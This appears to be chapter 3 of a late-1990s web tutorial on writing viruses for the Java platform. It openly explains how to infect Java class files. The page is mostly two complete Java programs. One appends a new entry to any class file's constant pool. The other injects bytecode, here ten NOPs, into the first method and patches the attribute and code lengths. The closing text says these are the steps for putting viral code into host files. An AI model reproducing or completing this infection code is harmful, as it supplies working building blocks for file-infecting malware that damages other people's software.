<HTML>
<HEAD>
   
   
   <TITLE>Security Risks Associated With The Java Platform - Chapter 3</TITLE>
</HEAD>
<BODY TEXT="#000000" BGCOLOR="#FFFFFF" LINK="#000000" VLINK="#000000" ALINK="#000000">
 
<CENTER><TABLE CELLSPACING=0 CELLPADDING=10 WIDTH="600" BGCOLOR="#000000" >
<TR>
<TD WIDTH="16%" BACKGROUND="lcbackgr.jpg">
<CENTER> </CENTER>
</TD>

<TD BGCOLOR="#FFFFFF">
<CENTER><IMG SRC="lcstrang.jpg" BGCOLOR="WHITE" HEIGHT=150 WIDTH=300><FONT FACE="Courier New,Courier"> </FONT></CENTER>

<CENTER><FONT FACE="Courier New,Courier">[ chapter 3 ]</FONT></CENTER>

<BLOCKQUOTE><FONT FACE="Courier New,Courier">introduction </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>Now that we have seen
how to modify a java class file, it is time to delve into some java code.
The class that will be used in the following examples is the java.io.RandomAccessFile
class. The interface for this class is included with the jdk documentation.</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>If you have programmed
in a higher level language before and are at least moderately proficient
with assembly language, it will be obvious how we may go about infecting
a java class file. Since this is not aimed at those who can already write
viruses in java (hello? if you can then why am I writing this?) I will
point out the most basic steps in infecting a class file.</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>Firstly it is important
to realise that executable code in java is reliant upon two things, the
code itself which lives in a code_attribute field and the constant_pool
which starts ten bytes from the beginning of the file. It is apparent from
the previous examples that if we want to insert viral code into a file
we can do this relatively easily by just modifiying a few fields here and
there. However, trouble occurs when we need our code to be inserted into
any file with varying numbers of constants in their constant_pool. This
can be easily overcome by allowing for changing offsets in our code.</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>For example, if we are
inserting a PrintStream() method which calls a string constant at position
constant_pool[y], we must modify the PrintStream() method to use the string
at constant_pool[y+constant_pool_length]. We must also modify the calling
code (since the method name resides in the constant_pool) such that instead
of calling the PrintStream() method with invoke_virtual constant_pool[z]
it calls constant_pool[z+constant_pool_length].</FONT></FONT> <FONT FACE="Courier New,Courier"><FONT SIZE=-1>(Ed:
later on you will see that we must decrement the constant_pool_length by
one for it all to work this is because the constant_pool[0] is reserved
for the virtual machine and does not appear in the class file)</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>For the following examples,
the positions where these modifications are inserted have been calculated
by hand. The greater problem of creating constant_pools and code_attributes
which are self-modifying without going through by hand is tackled further
on.</FONT></FONT> 

<P><FONT FACE="Courier New,Courier">analysis </FONT> 
<BR> 
<LI>
<FONT FACE="Courier New,Courier"><FONT SIZE=-1>example #1</FONT></FONT> </LI>


<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// =============================================</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// Title:  InsertConstant.java</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// Author: Landing Camel
International</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// Date:  
June 1998</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// Notes:</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// This example will
write a new string constant </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// to the end of the</FONT></FONT> 
<FONT FACE="Courier New,Courier"><FONT SIZE=-1>constant_pool of any java </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// class file.</FONT></FONT>
<FONT FACE="Courier New,Courier"><FONT SIZE=-1>The new entry as a hexadecimal</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// number is: </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT COLOR="#000000"><FONT SIZE=-1>//
0x01000D4C616E64696E672043616D656C </FONT></FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1><FONT COLOR="#000000">//
</FONT><FONT COLOR="#3333FF">CONST_String</FONT><FONT COLOR="#000000">
</FONT><FONT COLOR="#FF6600">Landing Camel</FONT></FONT></FONT><FONT COLOR="#000000"> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// =============================================</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>import java.io.*;</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>public class InsertConstant
{</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>public static void main(String
argv[]) </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>      
throws IOException {</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //number of new
constants in the class file</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int const_count
= 1;</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //this is the
constant to be inserted</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int old_consts[]
= {0x01,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x00,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x0D,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x4C,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x61,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x6E,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x64,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x69,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x6E,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x67,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x20,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x43,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x61,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x6D,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x65,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x6C};</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //change the constant
into an array of bytes</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  byte[] new_consts
= new </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  byte[old_consts.length];</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  for (int i=0;
i &lt; old_consts.length; i++) {</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
new_consts[i] = (byte)old_consts[i];</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  }</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //check that we
have a file on the command line</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  if ((argv.length
== 0) || </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
(!argv[0].endsWith(".class"))) {</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
System.out.println("Usage: java </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
InsertConstant file.class");</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
System.exit(1);</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  }</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //create an instance
of the file </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  RandomAccessFile
file = new </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    RandomAccessFile(argv[0],"rw");</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //read in the
current constant_count</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int fpointer
= 8;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int cp_entries
= file.readUnsignedShort();</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //write new constant_count</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT></FONT> <FONT FACE="Courier New,Courier"><FONT SIZE=-1> </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.writeShort(cp_entries+const_count);</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //seek to the
start of the const_pool</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  fpointer += 2;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //iterate through
const_pool</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //remember that
doubles and longs count as two</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  for (int i =
1; i &lt; cp_entries; i++) {</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
int tag = file.readUnsignedByte();</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
fpointer++;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
int skipper = 0;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
switch (tag) {</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 7: </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 8: fpointer += 2;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>             
break;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 3:</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 4:</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 9:</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 10:</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 11:</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 12: fpointer = fpointer + 4;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>              
break;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 5:</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 6: fpointer = fpointer + 8;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>             
i++;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>             
break;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 1: skipper = file.readUnsignedShort();</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>             
fpointer = fpointer + skipper + 2;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>             
break;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
}</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
file.seek(fpointer); </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  }</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //save the end
of the file</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int offset =
(int)file.length() - fpointer;</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  byte[] end =
new byte[offset];</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.read(end,
0, offset);</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //append our new
constant </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.write(new_consts);</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //restore tail
of file</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.write(end);</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //close file</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.close();</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1> }</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>}</FONT></FONT> 
<BR> 
<LI>
<FONT FACE="Courier New,Courier"><FONT SIZE=-1>example #2</FONT> </FONT></LI>


<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// =============================================</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// Title:  InsertCode.java</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// Author: Landing Camel
International</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// Date:  
June 1998</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// Notes:</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// This example inserts
new executable code into </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// any java class file.</FONT>
<FONT SIZE=-1>It inserts ten NOP </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// instructions which
have the hex value 0x00,</FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// into the first method
attribute of the class </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// file. </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>// =============================================</FONT></FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>import java.io.*;</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>public class InsertCode
{</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1> public static void
main(String argv[]) </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>       
throws IOException {</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //length of the
new code to be inserted</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int code_length
= 10;</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //this is the
actual to be inserted</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int old_code[]
= {0x00,</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x00,</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x00,</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x00,</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x00,</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x00,</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x00,</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x00,</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x00,</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    0x00,};</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //change the constant
into an array of bytes</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  byte[] new_code
= new byte[old_code.length];</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  for (int i=0;
i &lt; old_code.length; i++) {</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
new_code[i] = (byte)old_code[i];</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  }</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  if ((argv.length
== 0) || </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
(!argv[0].endsWith(".class"))) {</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
System.out.println("Usage: java InsertCode </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
file.class");</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
System.exit(1);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  }</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  RandomAccessFile
file = new </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
RandomAccessFile(argv[0],"rw");</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //read in const_count</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int fpointer
= 8;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int cp_entries
= file.readUnsignedShort();</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //seek to the
start of the const_pool</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  fpointer += 2;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //iterate through
const_pool</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  for (int i =
1; i &lt; cp_entries; i++) {</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
int tag = file.readUnsignedByte();</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
fpointer++;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
int skipper = 0;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
switch (tag) {</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 7: </FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 8: fpointer += 2;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>             
break;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 3:</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 4:</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 9:</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 10:</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 11:</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 12: fpointer = fpointer + 4;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>              
break;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 5:</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 6: fpointer = fpointer + 8;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>             
i++;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>             
break;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
case 1: skipper = file.readUnsignedShort();</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>             
fpointer = fpointer + skipper + 2;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>             
break;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
}</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
file.seek(fpointer); </FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  }</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //read in the
number of interfaces</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  fpointer += 6;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int num_interfaces
= file.readUnsignedShort();</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //iterate through
the interface information </FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  fpointer = fpointer
+ 2*(num_interfaces) + 2;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //read in the
number of fields</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int num_fields
= file.readUnsignedShort();</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  fpointer += 2;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //iterate through
the fields</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  for (int j=0;
j&lt;num_fields; j++) {</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>   //skip to
the attribute_count</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>   fpointer
+= 6;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>   file.seek(fpointer);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>   int num_f_attributes
= </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>     
file.readUnsignedShort();</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>   //iterate
through atribute_info</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>   fpointer
= fpointer+ 8*(num_f_attributes) + 2;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>   file.seek(fpointer);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  }</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //read the number
of methods</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int num_methods
= file.readUnsignedShort();</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //read the number
of method_attributes</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  fpointer += 8;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int num_m_attributes
= </FONT></FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>    
file.readUnsignedShort();</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //read in current
attribute_length</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  fpointer += 4;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int attribute_length
= file.readInt();</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //write new attribute_length</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.writeInt(attribute_length
+ code_length);</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //read in current
code_length</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  fpointer += 8;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int old_code_length
= file.readInt();</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //write new code_length</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.writeInt(old_code_length
+ code_length);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  fpointer += 4;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //save the end
of the file</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  int offset =
(int)file.length() - fpointer;</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  byte[] end =
new byte[offset];</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.read(end,
0, offset);</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //append our new
code to the end of the file</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.seek(fpointer);</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.write(new_code);</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //restore tail
of file</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.write(end);</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  //close file</FONT> </FONT> 
<BR><FONT FACE="Courier New,Courier"><FONT SIZE=-1>  file.close();</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1> }</FONT> </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>}</FONT></FONT> 

<P><FONT FACE="Courier New,Courier">conclusion </FONT> 

<P><FONT FACE="Courier New,Courier"><FONT SIZE=-1>The source code for the
two above examples are included with this distribution as wells as a combination
of these two examples. From these examples we can clearly see how we can
infect a file. We just have to be able to extract the hexadecimal code
for the constant_pool and the code_attribute from a viral program we have
written and adjust them to account for changing offsets in the host class
file.</FONT></FONT></BLOCKQUOTE>
<FONT FACE="Courier New,Courier"> </FONT></TD>
</TR>
</TABLE></CENTER>
 
</BODY>
</HTML>
